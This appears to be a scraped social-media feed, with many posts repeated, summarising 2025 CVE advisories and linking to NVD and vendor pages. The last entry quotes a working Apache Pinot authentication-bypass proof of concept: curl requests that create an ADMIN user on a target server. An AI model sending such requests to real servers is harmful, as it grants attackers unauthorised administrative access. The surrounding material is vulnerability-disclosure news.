A vulnerability was found in Tenda AC10 16.03.10.13 and classified as critical. This issue affects the function ShutdownSetAdd of the file /goform/ShutdownSetAdd. The manipulation of the argument list leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

https://nvd.nist.gov/vuln/detail/CVE-2025-3161

There are more CVEs for libsoup but because I'm 12, here's one specifically because I like the function name.

https://access.redhat.com/security/cve/CVE-2025-32052

A flaw was found in libsoup. A vulnerability in the sniff_unknown() function may lead to heap buffer over-read.

There are more CVEs for libsoup but because I'm 12, here's one specifically because I like the function name.

https://access.redhat.com/security/cve/CVE-2025-32052

A flaw was found in libsoup. A vulnerability in the sniff_unknown() function may lead to heap buffer over-read.

Backdoor in a robot dog thing? Yes please.

https://takeonme.org/cves/cve-2025-2894/

sev:MED 6.6 - CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

The Go1 also known as "The World's First Intelligence Bionic Quadruped Robot Companion of Consumer Level," contains an undocumented backdoor that can enable the manufacturer, and anyone in possession of the correct API key, complete remote control over the affected robotic device using the CloudSail remote access service.

https://nvd.nist.gov/vuln/detail/CVE-2025-2894

I don't know the Tauri shell but shell plugins seem like a nice attack surface if you know your target is running them.

https://github.com/tauri-apps/plugins-workspace/security/advisories/GHSA-c9pr-q8gx-3mgp

sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

The Tauri shell plugin allows access to the system shell. Prior to 2.2.1, the Tauri shell plugin exposes functionality to execute code and open programs on the system. The open endpoint of this plugin is designed to allow open functionality with the system opener (e.g. xdg-open on Linux). This was meant to be restricted to a reasonable number of protocols like https or mailto by default. This default restriction was not functional due to improper validation of the allowed protocols, allowing for potentially dangerous protocols like file://, smb://, or nfs:// and others to be opened by the system registered protocol handler. By passing untrusted user input to the open endpoint these potentially dangerous protocols can be abused to gain remote code execution on the system. This either requires direct exposure of the endpoint to application users or code execution in the frontend of a Tauri application. This vulnerability is fixed in 2.2.1.

https://nvd.nist.gov/vuln/detail/CVE-2025-31477

This seems like a pretty small scope but people seem to like leaked tokens so here you go.

https://github.com/canonical/get-workflow-version-action/security/advisories/GHSA-26wh-cc3r-w6pj

sev:HIGH 8.2 - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H

canonical/get-workflow-version-action is a GitHub composite action to get commit SHA that GitHub Actions reusable workflow was called with. Prior to 1.0.1, if the get-workflow-version-action step fails, the exception output may include the GITHUB_TOKEN. If the full token is included in the exception output, GitHub will automatically redact the secret from the GitHub Actions logs. However, the token may be truncated—causing part of the GITHUB_TOKEN to be displayed in plaintext in the GitHub Actions logs. Anyone with read access to the GitHub repository can view GitHub Actions logs. For public repositories, anyone can view the GitHub Actions logs. The opportunity to exploit this vulnerability is limited—the GITHUB_TOKEN is automatically revoked when the job completes. However, there is an opportunity for an attack in the time between the GITHUB_TOKEN being displayed in the logs and the completion of the job. Users using the github-token input are impacted. This vulnerability is fixed in 1.0.1.

https://nvd.nist.gov/vuln/detail/CVE-2025-31479

Vercel found a sev:LOW in doing next dot js code review after CVE-2025-29927 and already published a CVE so that's nice to see.

https://github.com/vercel/next.js/security/advisories/GHSA-223j-4rm8-mrmf

sev:LOW 1.7 - CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U

Next.js is a React framework for building full-stack web applications. To mitigate CVE-2025-29927, Next.js validated the x-middleware-subrequest-id which persisted across multiple incoming requests. However, this subrequest ID is sent to all requests, even if the destination is not the same host as the Next.js application. Initiating a fetch request to a third-party within Middleware will send the x-middleware-subrequest-id to that third party. This vulnerability is fixed in 12.3.6, 13.5.10, 14.2.26, and 15.2.4.

https://nvd.nist.gov/vuln/detail/CVE-2025-30218

Malform chunks leading to ( request ) smuggling? Watch out, Apache Traffic Server, I'm built for this.

https://lists.apache.org/thread/rwyx91rsrnmpjbm04footfjjf6m9d1c9

Apache Traffic Server allows request smuggling if chunked messages are malformed.

This issue affects Apache Traffic Server: from 9.2.0 through 9.2.9, from 10.0.0 through 10.0.4.

Users are recommended to upgrade to version 9.2.10 or 10.0.5, which fixes the issue.

https://nvd.nist.gov/vuln/detail/CVE-2024-53868

Malform chunks leading to ( request ) smuggling? Watch out, Apache Traffic Server, I'm built for this.

https://lists.apache.org/thread/rwyx91rsrnmpjbm04footfjjf6m9d1c9

Apache Traffic Server allows request smuggling if chunked messages are malformed.

This issue affects Apache Traffic Server: from 9.2.0 through 9.2.9, from 10.0.0 through 10.0.4.

Users are recommended to upgrade to version 9.2.10 or 10.0.5, which fixes the issue.

https://nvd.nist.gov/vuln/detail/CVE-2024-53868

MotW bypass CVE in WinRAR. I thought MotW bypass wasn't a real vulnerability? 🤪

Anyway, patch your WinRAR that you totally paid for.

https://jvn.jp/en/jp/JVN59547048/

sev:MED 6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

Issue that bypasses the "Mark of the Web" security warning function for files when opening a symbolic link that points to an executable file exists in WinRAR versions prior to 7.11. If a symbolic link specially crafted by an attacker is opened on the affected product, arbitrary code may be executed.

https://nvd.nist.gov/vuln/detail/CVE-2025-31334

MotW bypass CVE in WinRAR. I thought MotW bypass wasn't a real vulnerability? 🤪

Anyway, patch your WinRAR that you totally paid for.

https://jvn.jp/en/jp/JVN59547048/

sev:MED 6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

Issue that bypasses the "Mark of the Web" security warning function for files when opening a symbolic link that points to an executable file exists in WinRAR versions prior to 7.11. If a symbolic link specially crafted by an attacker is opened on the affected product, arbitrary code may be executed.

https://nvd.nist.gov/vuln/detail/CVE-2025-31334

All servers have been updated to OpenVPN 2.6.14 to address CVE-2025-2704

OpenVPN Server DoS could be a bummer if your configuration leaves you impacted.

https://community.openvpn.net/openvpn/wiki/CVE-2025-2704

OpenVPN version 2.6.1 through 2.6.13 in server mode using TLS-crypt-v2 allows remote attackers to trigger a denial of service by corrupting and replaying network packets in the early handshake phase

https://nvd.nist.gov/vuln/detail/CVE-2025-2704

No soup for you? More like too much soup for you. HAHA. Get it? Because it's... Never mind. I'll get more coffee.

https://gitlab.gnome.org/GNOME/libsoup/-/issues/422

sev:HIGH 7.0 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H

A flaw was found in libsoup. The package is vulnerable to a heap buffer over-read when sniffing content via the skip_insight_whitespace() function. Libsoup clients may read one byte out-of-bounds in response to a crafted HTTP response by an HTTP server.

https://nvd.nist.gov/vuln/detail/CVE-2025-2784

No soup for you? More like too much soup for you. HAHA. Get it? Because it's... Never mind. I'll get more coffee.

https://gitlab.gnome.org/GNOME/libsoup/-/issues/422

sev:HIGH 7.0 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H

A flaw was found in libsoup. The package is vulnerable to a heap buffer over-read when sniffing content via the skip_insight_whitespace() function. Libsoup clients may read one byte out-of-bounds in response to a crafted HTTP response by an HTTP server.

https://nvd.nist.gov/vuln/detail/CVE-2025-2784

Crypto vuln? In perl? That seems like something fedi is built to argue about.

https://metacpan.org/release/ZEFRAM/Data-Entropy-0.007/source/lib/Data/Entropy.pm#L80

Data::Entropy for Perl 0.007 and earlier use the rand() function as the default source of entropy, which is not cryptographically secure, for cryptographic functions.

https://nvd.nist.gov/vuln/detail/CVE-2025-1860

A critical flaw in Apache Parquet could let attackers run code remotely on your systems—rated a perfect 10.0 for severity. Is your big data framework safe? Read up on the fix and protect your data today.

https://thedefendopsdiaries.com/addressing-the-critical-cve-2025-30065-vulnerability-in-apache-parquet/

#cve202530065
#apacheparquet
#rcevulnerability
#bigdatasecurity
#cybersecurity

And we have a perfect 10 in Apache Parquet, whatever that is. 🥳

sev:CRIT 10.0 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code

Users are recommended to upgrade to version 1.15.1, which fixes the issue.

https://nvd.nist.gov/vuln/detail/CVE-2025-30065

Linux kernel: CVE-2024-57882 fix did not prevent data stream corruption in the MPTCP protocol

https://seclists.org/oss-sec/2025/q2/0

⚠️ CrushFTP Vulnerability Highlights Why Disclosure Discipline Matters

CVE-2025-2825, a critical auth bypass (CVSS 9.8) in CrushFTP, is now being actively exploited—with over 1,500 vulnerable servers online. But worse than the bug is the chaotic public drama around disclosure:
・Initial private alerts went out March 21 with minimal detail
・VulnCheck published a PoC, assigned its own CVE
・CrushFTP’s CEO accused vendors of harming customers
・Disputes led to confusion, CVE duplication, and rapid exploit weaponization

This is a case study in how poor coordination and ego can turn a patchable flaw into a public incident.

Security leaders: keep disclosure timelines tight, consistent, and put protection ahead of pride.

#CyberSecurity #DisclosureBestPractices #VulnerabilityManagement #CrushFTP #CVEs #IncidentResponse #PatchManagement

👉 https://www.darkreading.com/vulnerabilities-threats/disclosure-drama-clouds-crushftp-vulnerability-exploitation

Enables unauthenticated access to unpatched devices!

CrushFTP CVE-2025-2825 flaw actively exploited in the wild https://securityaffairs.com/176097/hacking/crushftp-cve-2025-2825-flaw-actively-exploited.html

#Security #Cybersecurity

Enables unauthenticated access to unpatched devices!

CrushFTP CVE-2025-2825 flaw actively exploited in the wild https://securityaffairs.com/176097/hacking/crushftp-cve-2025-2825-flaw-actively-exploited.html

#Security #Cybersecurity

CrushFTP Authentication Bypass - CVE-2025-2825 — ProjectDiscovery Blog https://projectdiscovery.io/blog/crushftp-authentication-bypass

CrushFTP CVE-2025-2825 flaw actively exploited in the wild – Source: securityaffairs.com https://ciso2ciso.com/crushftp-cve-2025-2825-flaw-actively-exploited-in-the-wild-source-securityaffairs-com/ #rssfeedpostgeneratorecho #informationsecuritynews #ITInformationSecurity #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #BreakingNews #SecurityNews #hackingnews #CrushFTP #Security #hacking

Attackers are targeting CrushFTP vulnerability with public PoC (CVE-2025-2825) https://www.helpnetsecurity.com/2025/04/01/crushftp-vulnerability-exploitation-cve-2025-2825/ #Shadowserver #Don'tmiss #VulnCheck #Hotstuff #CrushFTP #Rapid7 #News #CVE #PoC

CrushFTP Authentication Bypass - CVE-2025-2825 — ProjectDiscovery Blog https://projectdiscovery.io/blog/crushftp-authentication-bypass

Full technical analysis of CrushFTP CVE-2025-2825 here c/o @fuzz, and props to the Project Discovery folks who look to have come up with the same findings https://attackerkb.com/topics/k0EgiL9Psz/cve-2025-2825/rapid7-analysis

CrushFTP: Patch critical vulnerability ASAP! (CVE-2025-2825) https://www.helpnetsecurity.com/2025/03/27/crushftp-vulnerability-cve-2025-2825/ #securityupdate #vulnerability #file-sharing #enterprise #Don'tmiss #Hotstuff #CrushFTP #News #SMBs

🚨CVE-2025-2825: Unauthenticated HTTP(S) port access on CrushFTPv10/v11

CVSS: 9.8

https://darkwebinformer.com/cve-2025-2825-unauthenticated-http-s-port-access-on-crushftpv10-v11/

The CrushFTP CVE that @catc0n has been talking about is finally published.

https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update

sev:CRIT 9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability that may result in unauthenticated access. Remote and unauthenticated HTTP requests to CrushFTP may allow attackers to gain unauthorized access.

https://nvd.nist.gov/vuln/detail/CVE-2025-2825

Our pals over at VulnCheck very kindly assigned a CVE for the CrushFTP issue since CrushFTP appears reluctant to do the needful directly (thx @albinolobster!)

https://www.cve.org/cverecord?id=CVE-2025-2825

Trend Micro released an advisory for Trend Vision One. There are five CVEs for broken access control and one for HTML injection.

https://success.trendmicro.com/en-US/solution/KA-0019386

CVE-2025-31282, CVE-2025-31283, CVE-2025-31284, CVE-2025-31285: Broken Access Control Vulnerabilities

CVE-2025-31286: HTML Injection Vulnerability

The Meraki bug, tracked as CVE-2025-20212, was discovered in the AnyConnect VPN server, and was the result of a variable not being initialized when establishing an SSL VPN session. https://www.securityweek.com/vulnerabilities-expose-cisco-meraki-and-ece-products-to-dos-attacks/

The Meraki bug, tracked as CVE-2025-20212, was discovered in the AnyConnect VPN server, and was the result of a variable not being initialized when establishing an SSL VPN session. https://www.securityweek.com/vulnerabilities-expose-cisco-meraki-and-ece-products-to-dos-attacks/

Trend Micro released an advisory for Trend Vision One. There are five CVEs for broken access control and one for HTML injection.

https://success.trendmicro.com/en-US/solution/KA-0019386

CVE-2025-31282, CVE-2025-31283, CVE-2025-31284, CVE-2025-31285: Broken Access Control Vulnerabilities

CVE-2025-31286: HTML Injection Vulnerability

Trend Micro released an advisory for Trend Vision One. There are five CVEs for broken access control and one for HTML injection.

https://success.trendmicro.com/en-US/solution/KA-0019386

CVE-2025-31282, CVE-2025-31283, CVE-2025-31284, CVE-2025-31285: Broken Access Control Vulnerabilities

CVE-2025-31286: HTML Injection Vulnerability

Trend Micro released an advisory for Trend Vision One. There are five CVEs for broken access control and one for HTML injection.

https://success.trendmicro.com/en-US/solution/KA-0019386

CVE-2025-31282, CVE-2025-31283, CVE-2025-31284, CVE-2025-31285: Broken Access Control Vulnerabilities

CVE-2025-31286: HTML Injection Vulnerability

Trend Micro released an advisory for Trend Vision One. There are five CVEs for broken access control and one for HTML injection.

https://success.trendmicro.com/en-US/solution/KA-0019386

CVE-2025-31282, CVE-2025-31283, CVE-2025-31284, CVE-2025-31285: Broken Access Control Vulnerabilities

CVE-2025-31286: HTML Injection Vulnerability

New. The four vulnerabilities are CVE-2025-0014, CVE-2024-36337, CVE-2024-36328, and CVE-2024-36336, all rated for high severity.

AMD Ryzen™ AI Software Vulnerabilities https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7037.html #cybersecurity #Infosec #AMD #AI

AMD main product security link: https://www.amd.com/en/resources/product-security.html

New. The four vulnerabilities are CVE-2025-0014, CVE-2024-36337, CVE-2024-36328, and CVE-2024-36336, all rated for high severity.

AMD Ryzen™ AI Software Vulnerabilities https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7037.html #cybersecurity #Infosec #AMD #AI

AMD main product security link: https://www.amd.com/en/resources/product-security.html

New. The four vulnerabilities are CVE-2025-0014, CVE-2024-36337, CVE-2024-36328, and CVE-2024-36336, all rated for high severity.

AMD Ryzen™ AI Software Vulnerabilities https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7037.html #cybersecurity #Infosec #AMD #AI

AMD main product security link: https://www.amd.com/en/resources/product-security.html

New. The four vulnerabilities are CVE-2025-0014, CVE-2024-36337, CVE-2024-36328, and CVE-2024-36336, all rated for high severity.

AMD Ryzen™ AI Software Vulnerabilities https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7037.html #cybersecurity #Infosec #AMD #AI

AMD main product security link: https://www.amd.com/en/resources/product-security.html

Drupal published a bunch of CVEs for recent vulns of theirs, though they haven't been assessed for CVSS yet. I'm not going to list them all but there is one I want to point out.

https://www.drupal.org/security

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Drupal AI (Artificial Intelligence) allows OS Command Injection.This issue affects AI (Artificial Intelligence): from 0.0.0 before 1.0.5.

https://nvd.nist.gov/vuln/detail/CVE-2025-31693

Patch your Mozilla things. They released an advisory for Firefox and Thunderbird with four sev:HIGH vulns.

https://www.mozilla.org/en-US/security/advisories/mfsa2025-20/

CVE-2025-3028: Use-after-free triggered by XSLTProcessor

CVE-2025-3031: JIT optimization bug with different stack slot sizes

CVE-2025-3032: Leaking file descriptors from the fork server

CVE-2025-3029: URL bar spoofing via non-BMP Unicode characters

CVE-2025-3035: Tab title disclosure across pages when using AI chatbot

CVE-2025-3033: Opening local .url files could lead to another file being opened

CVE-2025-3030: Memory safety bugs fixed in Firefox 137, Thunderbird 137, Firefox ESR 128.9, and Thunderbird 128.9

CVE-2025-3034: Memory safety bugs fixed in Firefox 137 and Thunderbird 137

It seems like it's been a while since I've seen a SquirrelMail vuln.

sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

https://squirrelmail.org/security/issue.php?d=2025-04-02

mime.php in SquirrelMail through 1.4.23-svn-20250401 and 1.5.x through 1.5.2-svn-20250401 allows XSS via e-mail headers, because JavaScript payloads are mishandled after $encoded has been set to true.

https://nvd.nist.gov/vuln/detail/CVE-2025-30090

Another new CVE for an old critical ../ by Fortinet.

https://www.fortiguard.com/psirt/FG-IR-23-085

sev:CRIT 9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

A relative path traversal in Fortinet FortiSIEM versions 7.0.0, 6.7.0 through 6.7.2, 6.6.0 through 6.6.3, 6.5.1, 6.5.0 allows attacker to escalate privilege via uploading certain GUI elements

https://nvd.nist.gov/vuln/detail/CVE-2023-40714

Researchers, you don't need to be this patient. Just publish that shit.

https://medium.com/@mihat2/onlyoffice-document-server-path-traversal-fdd573fec291

Directory Traversal vulnerability in ONLYOFFICE Document Server v.7.5.0 and before allows a remote attacker to obtain sensitive information via a crafted file upload.

• October 10, 2023 – The moment I realized the flaw was real, I immediately reached out to ONLYOFFICE’s security team. To my surprise, they responded the same day! To ensure they had all the details, I sent them a thorough PDF report outlining the vulnerability, complete with technical analysis, proof-of-concept, and potential impact. I thought this was going to be a smooth disclosure process — how wrong I was.
• October 11 — November 19, 2023 — I followed up. Again. And again. Silence. Maybe my emails were lost? Maybe they were ignoring me? Either way, weeks passed, and still — no response.
• November 20, 2023 – We submitted the vulnerability to HackerOne, hoping to reach the ONLYOFFICE through another channel.
• December 4, 2023 – With no response from HackerOne, we escalated the report to HackerOne Disclosure Assistance, but STILL received no response.
• February 19, 2024 – ONLYOFFICE finally responded, stating that they were working on a fix.
• February 26, 2024 – ONLYOFFICE released a fix for the vulnerability.
• April 1, 2024 – ONLYOFFICE informed us that while the fix was available, some products would not receive the security patch until Summer 2024. They requested that we delay public disclosure until July 2024.
• February 21, 2025 – HackerOne Disclosure Assistance responded, stating that they were reviewing the backlog and asked for an update on the current situation.

https://nvd.nist.gov/vuln/detail/CVE-2023-46988

Zabbix published a few CVEs, including a couple sev:HIGH vulns.

https://support.zabbix.com/browse/ZBX-26257

sev:HIGH 8.6 - CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

A low privilege (regular) Zabbix user with API access can use SQL injection vulnerability in include/classes/api/CApiService.php to execute arbitrary SQL commands via the groupBy parameter.

https://nvd.nist.gov/vuln/detail/CVE-2024-36465

https://support.zabbix.com/browse/ZBX-26254

sev:HIGH 7.5 - CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

The endpoint /zabbix.php?action=export.valuemaps suffers from a Cross-Site Scripting vulnerability via the backurl parameter. This is caused by the reflection of user-supplied data without appropriate HTML escaping or output encoding. As a result, a JavaScript payload may be injected into the above endpoint causing it to be executed within the context of the victim's browser.

https://nvd.nist.gov/vuln/detail/CVE-2024-45699

Ooh, vulns in Moxa kit released today.

https://www.moxa.com/en/support/product-support/security-advisory/mpsa-259491-cve-2025-0415-command-injection-leading-to-denial-of-service-(dos)

sev:CRIT 9.2 - CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:H

A remote attacker with web administrator privileges can exploit the device’s web interface to execute arbitrary system commands through the NTP settings. Successful exploitation may result in the device entering an infinite reboot loop, leading to a total or partial denial of connectivity for downstream systems that rely on its network services.

https://nvd.nist.gov/vuln/detail/CVE-2025-0415

https://www.moxa.com/en/support/product-support/security-advisory/mpsa-259491-cve-2025-0676-command-injection-leading-to-privilege-escalation

sev:HIGH 8.6 - CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

This vulnerability involves command injection in tcpdump within Moxa products, enabling an authenticated attacker with console access to exploit improper input validation to inject and execute systems commands. Successful exploitation could result in privilege escalation, allowing the attacker to gain root shell access and maintain persistent control over the device, potentially disrupting network services and affecting the availability of downstream systems that rely on its connectivity.

https://nvd.nist.gov/vuln/detail/CVE-2025-0676

Ooh, vulns in Moxa kit released today.

https://www.moxa.com/en/support/product-support/security-advisory/mpsa-259491-cve-2025-0415-command-injection-leading-to-denial-of-service-(dos)

sev:CRIT 9.2 - CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:H

A remote attacker with web administrator privileges can exploit the device’s web interface to execute arbitrary system commands through the NTP settings. Successful exploitation may result in the device entering an infinite reboot loop, leading to a total or partial denial of connectivity for downstream systems that rely on its network services.

https://nvd.nist.gov/vuln/detail/CVE-2025-0415

https://www.moxa.com/en/support/product-support/security-advisory/mpsa-259491-cve-2025-0676-command-injection-leading-to-privilege-escalation

sev:HIGH 8.6 - CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

This vulnerability involves command injection in tcpdump within Moxa products, enabling an authenticated attacker with console access to exploit improper input validation to inject and execute systems commands. Successful exploitation could result in privilege escalation, allowing the attacker to gain root shell access and maintain persistent control over the device, potentially disrupting network services and affecting the availability of downstream systems that rely on its connectivity.

https://nvd.nist.gov/vuln/detail/CVE-2025-0676

Zabbix published a few CVEs, including a couple sev:HIGH vulns.

https://support.zabbix.com/browse/ZBX-26257

sev:HIGH 8.6 - CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

A low privilege (regular) Zabbix user with API access can use SQL injection vulnerability in include/classes/api/CApiService.php to execute arbitrary SQL commands via the groupBy parameter.

https://nvd.nist.gov/vuln/detail/CVE-2024-36465

https://support.zabbix.com/browse/ZBX-26254

sev:HIGH 7.5 - CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

The endpoint /zabbix.php?action=export.valuemaps suffers from a Cross-Site Scripting vulnerability via the backurl parameter. This is caused by the reflection of user-supplied data without appropriate HTML escaping or output encoding. As a result, a JavaScript payload may be injected into the above endpoint causing it to be executed within the context of the victim's browser.

https://nvd.nist.gov/vuln/detail/CVE-2024-45699

Patch your Mozilla things. They released an advisory for Firefox and Thunderbird with four sev:HIGH vulns.

https://www.mozilla.org/en-US/security/advisories/mfsa2025-20/

CVE-2025-3028: Use-after-free triggered by XSLTProcessor

CVE-2025-3031: JIT optimization bug with different stack slot sizes

CVE-2025-3032: Leaking file descriptors from the fork server

CVE-2025-3029: URL bar spoofing via non-BMP Unicode characters

CVE-2025-3035: Tab title disclosure across pages when using AI chatbot

CVE-2025-3033: Opening local .url files could lead to another file being opened

CVE-2025-3030: Memory safety bugs fixed in Firefox 137, Thunderbird 137, Firefox ESR 128.9, and Thunderbird 128.9

CVE-2025-3034: Memory safety bugs fixed in Firefox 137 and Thunderbird 137

Patch your Mozilla things. They released an advisory for Firefox and Thunderbird with four sev:HIGH vulns.

https://www.mozilla.org/en-US/security/advisories/mfsa2025-20/

CVE-2025-3028: Use-after-free triggered by XSLTProcessor

CVE-2025-3031: JIT optimization bug with different stack slot sizes

CVE-2025-3032: Leaking file descriptors from the fork server

CVE-2025-3029: URL bar spoofing via non-BMP Unicode characters

CVE-2025-3035: Tab title disclosure across pages when using AI chatbot

CVE-2025-3033: Opening local .url files could lead to another file being opened

CVE-2025-3030: Memory safety bugs fixed in Firefox 137, Thunderbird 137, Firefox ESR 128.9, and Thunderbird 128.9

CVE-2025-3034: Memory safety bugs fixed in Firefox 137 and Thunderbird 137

Patch your Mozilla things. They released an advisory for Firefox and Thunderbird with four sev:HIGH vulns.

https://www.mozilla.org/en-US/security/advisories/mfsa2025-20/

CVE-2025-3028: Use-after-free triggered by XSLTProcessor

CVE-2025-3031: JIT optimization bug with different stack slot sizes

CVE-2025-3032: Leaking file descriptors from the fork server

CVE-2025-3029: URL bar spoofing via non-BMP Unicode characters

CVE-2025-3035: Tab title disclosure across pages when using AI chatbot

CVE-2025-3033: Opening local .url files could lead to another file being opened

CVE-2025-3030: Memory safety bugs fixed in Firefox 137, Thunderbird 137, Firefox ESR 128.9, and Thunderbird 128.9

CVE-2025-3034: Memory safety bugs fixed in Firefox 137 and Thunderbird 137

Patch your Mozilla things. They released an advisory for Firefox and Thunderbird with four sev:HIGH vulns.

https://www.mozilla.org/en-US/security/advisories/mfsa2025-20/

CVE-2025-3028: Use-after-free triggered by XSLTProcessor

CVE-2025-3031: JIT optimization bug with different stack slot sizes

CVE-2025-3032: Leaking file descriptors from the fork server

CVE-2025-3029: URL bar spoofing via non-BMP Unicode characters

CVE-2025-3035: Tab title disclosure across pages when using AI chatbot

CVE-2025-3033: Opening local .url files could lead to another file being opened

CVE-2025-3030: Memory safety bugs fixed in Firefox 137, Thunderbird 137, Firefox ESR 128.9, and Thunderbird 128.9

CVE-2025-3034: Memory safety bugs fixed in Firefox 137 and Thunderbird 137

Flaw impacts drivers Generic Plus PCL6, UFR II, LIPS4, LIPSXL, and PS. That's quite a big range! Tracked as CVE-2025-1268 (CVSS score of 9.4).

Microsoft warns of critical flaw in Canon printer drivers https://securityaffairs.com/176104/security/microsoft-warns-of-critical-flaw-in-canon-printer-drivers.html

#Security #Canon

Flaw impacts drivers Generic Plus PCL6, UFR II, LIPS4, LIPSXL, and PS. That's quite a big range! Tracked as CVE-2025-1268 (CVSS score of 9.4).

Microsoft warns of critical flaw in Canon printer drivers https://securityaffairs.com/176104/security/microsoft-warns-of-critical-flaw-in-canon-printer-drivers.html

#Security #Canon

🚨 Critical vulnerability (CVE-2025-1268) found in Canon printer drivers allow remote code execution with no user interaction - Update your drivers ASAP.

Read: https://hackread.com/canon-printer-drivers-flaw-hackers-run-malicious-code/

#CyberSecurity #Canon #Printer #Vulnerability

Canon CVE-2025-1268 Vulnerability: A Buffer Overflow Threatening Printer Security https://thecyberexpress.com/canon-printer-vulnerability-cve-2025-1268/ #outofboundsvulnerability #TheCyberExpressNews #Canonvulnerability #Vulnerabilities #TheCyberExpress #FirewallDaily #Canonprinter #CVE20251268 #GenericPlus #CyberNews

Amazon, posted yesterday: Issue with AWS SAM CLI (CVE-2025-3047, CVE-2025-3048) has been resolved https://aws.amazon.com/security/security-bulletins/AWS-2025-008/ #Amazon #cybersecurity #Inffosec

Issue with AWS SAM CLI (CVE-2025-3047, CVE-2025-3048)

https://aws.amazon.com/security/security-bulletins/AWS-2025-008/

sev:MED 6.9 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

When running the AWS Serverless Application Model Command Line Interface (SAM CLI) build process with Docker and symlinks are included in the build files, the container environment allows a user to access privileged files on the host by leveraging the elevated permissions granted to the tool. A user could leverage the elevated permissions to access restricted files via symlinks and copy them to a more permissive location on the container. Users should upgrade to v1.133.0 or newer and ensure any forked or derivative code is patched to incorporate the new fixes.

https://nvd.nist.gov/vuln/detail/CVE-2025-3047

Amazon, posted yesterday: Issue with AWS SAM CLI (CVE-2025-3047, CVE-2025-3048) has been resolved https://aws.amazon.com/security/security-bulletins/AWS-2025-008/ #Amazon #cybersecurity #Inffosec

Issue with AWS SAM CLI (CVE-2025-3047, CVE-2025-3048)

https://aws.amazon.com/security/security-bulletins/AWS-2025-008/

sev:MED 6.9 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

When running the AWS Serverless Application Model Command Line Interface (SAM CLI) build process with Docker and symlinks are included in the build files, the container environment allows a user to access privileged files on the host by leveraging the elevated permissions granted to the tool. A user could leverage the elevated permissions to access restricted files via symlinks and copy them to a more permissive location on the container. Users should upgrade to v1.133.0 or newer and ensure any forked or derivative code is patched to incorporate the new fixes.

https://nvd.nist.gov/vuln/detail/CVE-2025-3047

LPE in VMWare Aria Operations.

https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25541

sev:HIGH 7.8 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

VMware Aria Operations contains a local privilege escalation vulnerability. A malicious actor with local administrative privileges can escalate their privileges to root on the appliance running VMware Aria Operations.

https://nvd.nist.gov/vuln/detail/CVE-2025-22231

I don't know Apache Pinot but this seems like a good one to keep in your back pocket.

https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v

Authentication Bypass Issue

If the path does not contain / and contain., authentication is not required.

Expected Normal Request and Response Example

curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users

Return: {"code":401,"error":"HTTP 401 Unauthorized"}

Malicious Request and Response Example

curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .

Return: {"users":{}}

https://nvd.nist.gov/vuln/detail/CVE-2024-56325

